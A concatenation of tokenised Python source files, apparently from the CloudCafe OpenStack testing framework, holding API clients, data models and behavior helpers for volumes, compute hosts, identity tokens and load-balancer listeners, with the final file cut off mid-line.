<EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . _filter_model_list ( <EOL> volume_type_list , model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vtype in volume_type_list : <EOL> for flavor in flavor_list : <EOL> for image in image_list : <EOL> data = { '<STR_LIT>' : vtype , <EOL> '<STR_LIT>' : flavor , <EOL> '<STR_LIT:image>' : image } <EOL> testname = "<STR_LIT>" . format ( <EOL> flavor = str ( flavor . name ) , image = str ( image . name ) , <EOL> vtype = str ( vtype . name ) ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) . replace ( <EOL> '<STR_LIT:.>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:(>' , '<STR_LIT>' ) . replace ( '<STR_LIT:)>' , '<STR_LIT>' ) <EOL> dataset_list . append_new_dataset ( testname , data ) <EOL> return cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> @ classmethod <EOL> def configured_images ( cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> return cls . images ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> model_filter = image_filter , filter_mode = image_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . images_by_volume_type ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , volume_type_filter = volume_type_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> volume_type_filter_mode = volume_type_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_flavor ( cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> flavor_filter = cls . _volumes . config . flavor_filter <EOL> flavor_filter_mode = cls . _volumes . config . flavor_filter_mode <EOL> return cls . images_by_flavor ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , flavor_filter = flavor_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> flavor_filter_mode = flavor_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_flavor_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> flavor_filter = cls . _volumes . config . flavor_filter <EOL> flavor_filter_mode = cls . _volumes . config . flavor_filter_mode <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . flavors_by_images_by_volume_type ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , flavor_filter = flavor_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> flavor_filter_mode = flavor_filter_mode , <EOL> volume_type_filter = volume_type_filter , <EOL> volume_type_filter_mode = volume_type_filter_mode ) </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . cloudkeep . barbican . client import BarbicanRestClient <EOL> from cloudcafe . cloudkeep . barbican . version . models . version import Version <EOL> class VersionClient ( BarbicanRestClient ) : <EOL> def __init__ ( self , url , token = None , serialize_format = None , <EOL> deserialize_format = None ) : <EOL> """<STR_LIT>""" <EOL> super ( VersionClient , self ) . __init__ ( <EOL> token = token , serialize_format = serialize_format , <EOL> deserialize_format = deserialize_format ) <EOL> self . url = url <EOL> def get_version ( self , headers = None ) : <EOL> """<STR_LIT>""" <EOL> resp = self . request ( '<STR_LIT:GET>' , self . url , headers = headers , <EOL> response_entity_type = Version ) <EOL> return resp </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import xml . etree . ElementTree as ET <EOL> from cafe . engine . models . base import AutoMarshallingModel <EOL> from cloudcafe . compute . common . equality_tools import EqualityTools <EOL> from cloudcafe . compute . cells_api . model . capacity import CellCapacity <EOL> class Cell ( AutoMarshallingModel ) : <EOL> def __init__ ( self , disk_capacity = None , ram_capacity = None ) : <EOL> super ( Cell , self ) . __init__ ( ) <EOL> self . disk_capacity = disk_capacity <EOL> self . ram_capacity = ram_capacity <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return EqualityTools . are_objects_equal ( self , other ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> @ classmethod <EOL> def _json_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> json_dict = json . loads ( serialized_str ) <EOL> disk_capacity_dict = json_dict . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) <EOL> disk_capacity = CellCapacity . _dict_to_obj ( disk_capacity_dict ) <EOL> ram_capacity_dict = json_dict . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) <EOL> ram_capacity = CellCapacity . _dict_to_obj ( ram_capacity_dict ) <EOL> cell = Cell ( disk_capacity , ram_capacity ) <EOL> return cell <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , cell_dict ) : <EOL> """<STR_LIT>""" <EOL> cell = Cell ( ** cell_dict ) <EOL> return cell <EOL> @ classmethod <EOL> def _xml_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> element = ET . fromstring ( serialized_str ) <EOL> capacity = element . find ( '<STR_LIT>' ) <EOL> ram_capacity_xml = capacity . find ( '<STR_LIT>' ) <EOL> ram_capacity = CellCapacity . _xml_to_obj ( ram_capacity_xml ) <EOL> disk_capacity_xml = capacity . find ( "<STR_LIT>" ) <EOL> disk_capacity = CellCapacity . _xml_to_obj ( disk_capacity_xml ) <EOL> cell = Cell ( disk_capacity , ram_capacity ) <EOL> return cell </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . compute . events . models . base import EventBaseModel <EOL> from cloudcafe . compute . events . models . common import FixedIps <EOL> BASE_KWARG_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT:host>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT:state>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class InstanceResizeConfirmStart ( EventBaseModel ) : <EOL> """<STR_LIT>""" <EOL> kwarg_map = { } <EOL> kwarg_map . update ( BASE_KWARG_MAP ) <EOL> def __init__ ( self , access_ip_v4 , access_ip_v6 , architecture , <EOL> availability_zone , cell_name , created_at , deleted_at , <EOL> disk_gb , display_name , ephemeral_gb , host , hostname , <EOL> image_meta , image_ref_url , instance_flavor_id , instance_id , <EOL> instance_type , instance_type_id , kernel_id , launched_at , <EOL> memory_mb , metadata , node , os_type , progress , ramdisk_id , <EOL> reservation_id , root_gb , state , state_description , tenant_id , <EOL> terminated_at , user_id , vcpus ) : <EOL> super ( InstanceResizeConfirmStart , self ) . __init__ ( locals ( ) ) <EOL> class InstanceResizeConfirmEnd ( EventBaseModel ) : <EOL> """<STR_LIT>""" <EOL> kwarg_map = { '<STR_LIT>' : '<STR_LIT>' } <EOL> kwarg_map . update ( BASE_KWARG_MAP ) <EOL> def __init__ ( self , access_ip_v4 , access_ip_v6 , architecture , <EOL> availability_zone , cell_name , created_at , deleted_at , <EOL> disk_gb , display_name , ephemeral_gb , fixed_ips , host , <EOL> hostname , image_meta , image_ref_url , instance_flavor_id , <EOL> instance_id , instance_type , instance_type_id , kernel_id , <EOL> launched_at , memory_mb , metadata , node , os_type , progress , <EOL> ramdisk_id , reservation_id , root_gb , state , state_description , <EOL> tenant_id , terminated_at , user_id , vcpus ) : <EOL> super ( InstanceResizeConfirmEnd , self ) . __init__ ( locals ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , json_dict ) : <EOL> """<STR_LIT>""" <EOL> obj = cls . _map_values_to_kwargs ( json_dict ) <EOL> obj . fixed_ips = FixedIps . _list_to_obj ( obj . fixed_ips ) <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . compute . common . composites import BaseComputeComposite <EOL> from cloudcafe . compute . extensions . rescue_api . client import RescueClient <EOL> class RescueComposite ( BaseComputeComposite ) : <EOL> def __init__ ( self , auth_composite ) : <EOL> super ( RescueComposite , self ) . __init__ ( auth_composite ) <EOL> self . client = RescueClient ( ** self . compute_auth_composite . client_args ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import xml . etree . ElementTree as ET <EOL> from cafe . engine . models . base import AutoMarshallingModel <EOL> from cloudcafe . compute . common . equality_tools import EqualityTools <EOL> from cloudcafe . compute . hosts_api . models . resources import Resource <EOL> class Host ( AutoMarshallingModel ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> for key , value in kwargs . iteritems ( ) : <EOL> setattr ( self , key , value ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return EqualityTools . are_objects_equal ( self , other ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> @ classmethod <EOL> def _json_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> json_dict = json . loads ( serialized_str ) <EOL> if '<STR_LIT:host>' in json_dict . keys ( ) : <EOL> resources = [ ] <EOL> for resource in json_dict . get ( "<STR_LIT:host>" ) : <EOL> resources . append ( <EOL> Resource . _dict_to_obj ( resource . get ( "<STR_LIT>" ) ) ) <EOL> host = Host ( resources = resources ) <EOL> return host <EOL> if '<STR_LIT>' in json_dict . keys ( ) : <EOL> hosts = [ ] <EOL> for host_dict in json_dict . get ( "<STR_LIT>" ) : <EOL> hosts . append ( cls . _dict_to_obj ( host_dict ) ) <EOL> return hosts <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , host_dict ) : <EOL> """<STR_LIT>""" <EOL> host = Host ( ** host_dict ) <EOL> return host <EOL> @ classmethod <EOL> def _xml_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> element = ET . fromstring ( serialized_str ) <EOL> if element . tag == '<STR_LIT:host>' : <EOL> resources = [ ] <EOL> for resource in element . _children : <EOL> resources . append ( Resource . _xml_to_obj ( resource ) ) <EOL> host = Host ( resources = resources ) <EOL> return host <EOL> if element . tag == '<STR_LIT>' : <EOL> hosts = [ ] <EOL> for host in element . findall ( '<STR_LIT:host>' ) : <EOL> host = cls . _xml_ele_to_obj ( host ) <EOL> hosts . append ( host ) <EOL> return hosts <EOL> @ classmethod <EOL> def _xml_ele_to_obj ( cls , element ) : <EOL> """<STR_LIT>""" <EOL> host = Host ( ** element . attrib ) <EOL> return host </s>
<s> from time import sleep , time <EOL> from cloudcafe . common . behaviors import ( <EOL> StatusProgressionVerifier , StatusProgressionVerifierError ) <EOL> from cloudcafe . compute . common . behaviors import BaseComputeBehavior <EOL> from cloudcafe . compute . volume_attachments_api . config import VolumeAttachmentsAPIConfig <EOL> class VolumeAttachmentBehaviorError ( Exception ) : <EOL> pass <EOL> class VolumeAttachmentsAPI_Behaviors ( BaseComputeBehavior ) : <EOL> def __init__ ( <EOL> self , volume_attachments_client = None , <EOL> volume_attachments_config = None , volumes_client = None ) : <EOL> super ( VolumeAttachmentsAPI_Behaviors , self ) . __init__ ( ) <EOL> self . client = volume_attachments_client <EOL> self . config = volume_attachments_config or VolumeAttachmentsAPIConfig ( ) <EOL> self . volumes_client = volumes_client <EOL> def _validated_volume_attach ( self , server_id , volume_id , device = None ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client . attach_volume ( server_id , volume_id , device = device ) <EOL> if not resp . ok : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( resp . status_code , volume_id , server_id ) ) <EOL> if resp . entity is None : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> volume_id , server_id ) ) <EOL> return resp <EOL> def _validated_volume_detach ( self , attachment_id , server_id ) : <EOL> resp = self . client . delete_volume_attachment ( <EOL> attachment_id , server_id ) <EOL> if not resp . ok : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( resp . status_code , attachment_id , server_id ) ) <EOL> return resp <EOL> def _get_volume_status ( self , volume_id ) : <EOL> resp = self . volumes_client . get_volume_info ( volume_id = volume_id ) <EOL> if not resp . ok : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( resp . status_code ) ) <EOL> self . _log . error ( msg ) <EOL> raise Exception ( msg ) <EOL> if resp . entity is None : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . error ( msg ) <EOL> raise Exception ( msg ) <EOL> return resp . entity . status <EOL> def wait_for_attachment_to_propagate ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = <NUM_LIT:5> ) : <EOL> timeout = timeout or self . config . attachment_propagation_timeout <EOL> poll_rate = poll_rate or self . config . api_poll_rate <EOL> endtime = time ( ) + int ( timeout ) <EOL> while time ( ) < endtime : <EOL> resp = self . client . get_volume_attachment_details ( <EOL> attachment_id , server_id ) <EOL> if resp . ok : <EOL> return True <EOL> sleep ( poll_rate ) <EOL> else : <EOL> return False <EOL> def wait_for_attachment_to_delete ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = None ) : <EOL> timeout = timeout or self . config . attachment_propagation_timeout <EOL> poll_rate = poll_rate or self . config . api_poll_rate <EOL> endtime = time ( ) + int ( timeout ) <EOL> while time ( ) < endtime : <EOL> resp = self . client . get_volume_attachment_details ( <EOL> attachment_id , server_id ) <EOL> if resp . status_code == <NUM_LIT> : <EOL> return None <EOL> sleep ( poll_rate ) <EOL> else : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> attachment_id , server_id , timeout ) ) <EOL> def verify_volume_status_progression_during_attachment ( <EOL> self , volume_id , state_list = None ) : <EOL> verifier = StatusProgressionVerifier ( <EOL> '<STR_LIT>' , volume_id , self . _get_volume_status , volume_id ) <EOL> verifier . set_global_state_properties ( <EOL> timeout = self . config . attachment_timeout ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . start ( ) <EOL> def verify_volume_status_progression_during_detachment ( <EOL> self , volume_id , raise_on_error = True ) : <EOL> """<STR_LIT>""" <EOL> verifier = StatusProgressionVerifier ( <EOL> '<STR_LIT>' , volume_id , self . _get_volume_status , volume_id ) <EOL> verifier . set_global_state_properties ( <EOL> timeout = self . config . attachment_timeout ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ <EOL> '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> try : <EOL> verifier . start ( ) <EOL> except Exception as exception : <EOL> if raise_on_error : <EOL> raise exception <EOL> def attach_volume_to_server ( <EOL> self , server_id , volume_id , device = None , <EOL> attachment_propagation_timeout = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> attachment_propagation_timeout = ( <EOL> attachment_propagation_timeout <EOL> or self . config . attachment_propagation_timeout ) <EOL> resp = self . _validated_volume_attach ( server_id , volume_id , device ) <EOL> attachment = resp . entity <EOL> propagated = self . wait_for_attachment_to_propagate ( <EOL> attachment . id_ , server_id , timeout = attachment_propagation_timeout ) <EOL> if not propagated : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> attachment . id_ , server_id , attachment_propagation_timeout ) ) <EOL> self . verify_volume_status_progression_during_attachment ( volume_id ) <EOL> return attachment <EOL> def delete_volume_attachment ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = None ) : <EOL> """<STR_LIT>""" <EOL> self . _validated_volume_detach ( attachment_id , server_id ) <EOL> self . wait_for_attachment_to_delete ( <EOL> attachment_id , server_id , timeout , poll_rate ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from xml . etree import ElementTree <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . base import BaseIdentityModel <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . constants import V2_0Constants <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . requests . credentials import ApiKeyCredentials <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . requests . passcode import PasscodeCredentials <EOL> class Auth ( BaseIdentityModel ) : <EOL> ROOT_TAG = '<STR_LIT>' <EOL> def __init__ ( self , apiKeyCredentials = None , passcodeCredentials = None , <EOL> tenantId = None , token = None ) : <EOL> super ( Auth , self ) . __init__ ( ) <EOL> self . apiKeyCredentials = apiKeyCredentials <EOL> self . passcode_credentials = passcodeCredentials <EOL> self . token = token <EOL> self . tenantId = tenantId <EOL> def _obj_to_json ( self ) : <EOL> ret = { } <EOL> if self . apiKeyCredentials is not None : <EOL> ret [ ApiKeyCredentials . JSON_ROOT_TAG ] = self . apiKeyCredentials . _obj_to_dict ( ) <EOL> if self . token is not None : <EOL> ret [ Token . ROOT_TAG ] = self . token . _obj_to_dict ( ) <EOL> if self . tenantId is not None : <EOL> ret [ '<STR_LIT>' ] = self . tenantId <EOL> else : <EOL> ret [ PasscodeCredentials . RAW_NAME ] = self . passcode_credentials . _obj_to_dict ( ) <EOL> ret = { self . ROOT_TAG : ret } <EOL> return json . dumps ( ret ) <EOL> def _obj_to_xml ( self ) : <EOL> ele = self . _obj_to_xml_ele ( ) <EOL> if self . apiKeyCredentials is not None : <EOL> ele . find ( ApiKeyCredentials . ROOT_TAG ) . set ( <EOL> '<STR_LIT>' , <EOL> V2_0Constants . XML_NS_RAX_KSKEY ) <EOL> else : <EOL> ele . set ( '<STR_LIT>' , V2_0Constants . XML_NS_XSI ) <EOL> ele . set ( '<STR_LIT>' , V2_0Constants . XML_NS ) <EOL> return ElementTree . tostring ( ele ) <EOL> def _obj_to_xml_ele ( self ) : <EOL> element = ElementTree . Element ( self . ROOT_TAG ) <EOL> if self . apiKeyCredentials is not None : <EOL> element . append ( self . apiKeyCredentials . _obj_to_xml_ele ( ) ) <EOL> if self . token is not None : <EOL> element . append ( self . token . _obj_to_xml_ele ( ) ) <EOL> if self . tenantId is not None : <EOL> element . set ( '<STR_LIT>' , self . tenantId ) <EOL> return element <EOL> class Token ( BaseIdentityModel ) : <EOL> ROOT_TAG = '<STR_LIT>' <EOL> def __init__ ( self , id = None ) : <EOL> super ( Token , self ) . __init__ ( ) <EOL> self . id = id <EOL> def _obj_to_dict ( self ) : <EOL> ret = { } <EOL> if self . id is not None : <EOL> ret [ '<STR_LIT:id>' ] = self . id <EOL> return ret <EOL> def _obj_to_xml ( self ) : <EOL> return ElementTree . tostring ( self . _obj_to_xml_ele ( ) ) <EOL> def _obj_to_xml_ele ( self ) : <EOL> element = ElementTree . Element ( self . ROOT_TAG ) <EOL> if self . id is not None : <EOL> element . set ( '<STR_LIT:id>' , self . id ) <EOL> return element </s>
<s> """<STR_LIT>""" <EOL> class V2_0Constants ( object ) : <EOL> XML_NS = '<STR_LIT>' <EOL> XML_NS_OPENSTACK_COMMON = '<STR_LIT>' <EOL> XML_NS_XSI = '<STR_LIT>' <EOL> XML_NS_OS_KSADM = '<STR_LIT>' <EOL> XML_NS_OS_KSEC2 = '<STR_LIT>' <EOL> XML_NS_RAX_KSQA = '<STR_LIT>' <EOL> XML_NS_RAX_KSKEY = '<STR_LIT>' <EOL> XML_NS_RAX_AUTH = '<STR_LIT>' <EOL> XML_NS_RAX_KSGRP = '<STR_LIT>' <EOL> XML_NS_ATOM = '<STR_LIT>' <EOL> class AdminExtensions ( object ) : <EOL> OS_KS_ADM = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from json import dumps as json_to_str <EOL> from cafe . engine . models . base import ( AutoMarshallingModel , <EOL> AutoMarshallingListModel ) <EOL> class SystemInfo ( AutoMarshallingModel ) : <EOL> def __init__ ( self , disk_usage = None , os_type = None , memory_mb = None , <EOL> architecture = None , cpu_cores = None , load_average = None , <EOL> timestamp = None ) : <EOL> super ( SystemInfo , self ) . __init__ ( ) <EOL> self . os_type = os_type <EOL> self . memory_mb = memory_mb <EOL> self . architecture = architecture <EOL> self . cpu_cores = cpu_cores <EOL> self . load_average = load_average <EOL> self . disk_usage = disk_usage <EOL> self . timestamp = timestamp <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> def _obj_to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . os_type , <EOL> '<STR_LIT>' : self . memory_mb , <EOL> '<STR_LIT>' : self . architecture , <EOL> '<STR_LIT>' : self . cpu_cores , <EOL> '<STR_LIT>' : self . disk_usage . _obj_to_dict ( ) , <EOL> '<STR_LIT>' : self . load_average . _obj_to_dict ( ) , <EOL> '<STR_LIT>' : self . timestamp or datetime . utcnow ( ) . isoformat ( ) <EOL> } <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , dic ) : <EOL> disk_usage = DiskUsage . _dict_to_obj ( dic . get ( '<STR_LIT>' ) ) <EOL> load_average = LoadAverage . _dict_to_obj ( dic . get ( '<STR_LIT>' ) ) <EOL> kwargs = { <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : disk_usage , <EOL> '<STR_LIT>' : load_average , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) <EOL> } <EOL> return SystemInfo ( ** kwargs ) <EOL> class LoadAverage ( AutoMarshallingModel ) : <EOL> def __init__ ( self , one_average = None , five_average = None , <EOL> fifteen_average = None ) : <EOL> super ( LoadAverage , self ) . __init__ ( ) <EOL> self . one_average = one_average <EOL> self . five_average = five_average <EOL> self . fifteen_average = fifteen_average <EOL> def _obj_to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT:1>' : self . one_average , <EOL> '<STR_LIT:5>' : self . five_average , <EOL> '<STR_LIT>' : self . fifteen_average <EOL> } <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , dic ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:5>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:5>' ) <EOL> } <EOL> return LoadAverage ( ** kwargs ) <EOL> class DiskUsage ( AutoMarshallingListModel ) : <EOL> def _obj_to_dict ( self ) : <EOL> return [ disk . _obj_to_dict ( ) for disk in self ] <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , json_dict ) : <EOL> usage = cls ( ) <EOL> for disk in json_dict : <EOL> part = Partition ( name = disk . get ( '<STR_LIT>' ) , <EOL> used = disk . get ( '<STR_LIT>' ) , <EOL> total = disk . get ( '<STR_LIT>' ) ) <EOL> usage . append ( part ) <EOL> return usage <EOL> class Partition ( AutoMarshallingModel ) : <EOL> def __init__ ( self , name = None , total = None , used = None ) : <EOL> super ( Partition , self ) . __init__ ( ) <EOL> self . name = name <EOL> self . total = total <EOL> self . used = used <EOL> def _obj_to_dict ( self ) : <EOL> body = { <EOL> '<STR_LIT>' : self . name , <EOL> '<STR_LIT>' : self . total , <EOL> '<STR_LIT>' : self . used <EOL> } <EOL> return body <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . networking . lbaas . common . behaviors import BaseLoadBalancersBehaviors <EOL> class ListenerBehaviors ( BaseLoadBalancersBehaviors ) : <EOL> OBJECT_MODEL = '<STR_LIT>' <EOL> def __init__ ( self , listeners_client , config ) : <EOL> super ( ListenerBehaviors , self ) . __init__ ( <EOL> lbaas_client_type = listeners_client , config = config ) <EOL> def create_active_listener ( <EOL> self , name , load_balancer_id , tenant_id , default_pool_id , <EOL> protocol , protocol_port , description = None , <EOL> connection_limit = None , admin_state_up = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT:name>' : name , '<STR_LIT>' : load_balancer_id , <EOL> '<STR_LIT>' : tenant_id , '<STR_LIT>' : default_pool_id , <EOL> '<STR_LIT>' : protocol , '<STR_LIT>' : protocol_port , <EOL> '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : connection_limit , <EOL> '<STR_LIT>' : admin_state_up } <EOL> resp = self . create_active_lbaas_object ( <EOL> lbaas_model_type = self . OBJECT_MODEL , <EOL> kwargs = kwargs ) <EOL> return resp <EOL> def update_listener_and_wait_for_active ( <EOL> self , name = None , description = None , default_pool_id = None , <EOL> load_balancer_id = None , admin_state_up = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT:name>' : name , '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : default_pool_id , <EOL> '<STR_LIT>' : load_balancer_id , <EOL> '<STR_LIT>' : admin_state_up } <EOL> resp = self . update_lbaas_object_and_wait_for_active ( <EOL> lbaas_model_type = self . OBJECT_MODEL , <EOL> kwargs = kwargs ) <EOL> return resp <EOL> def wait_for_listener_status ( self , listener_id , desired_status , <EOL> interval_time = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> kwargs = { '<STR_LIT>' : listener_id , <EOL> '<STR_LIT>' : desired_status , <EOL> '<STR_LIT>' : interval_time , <EOL> '<STR_LIT>' : timeout } <EOL> resp = self . 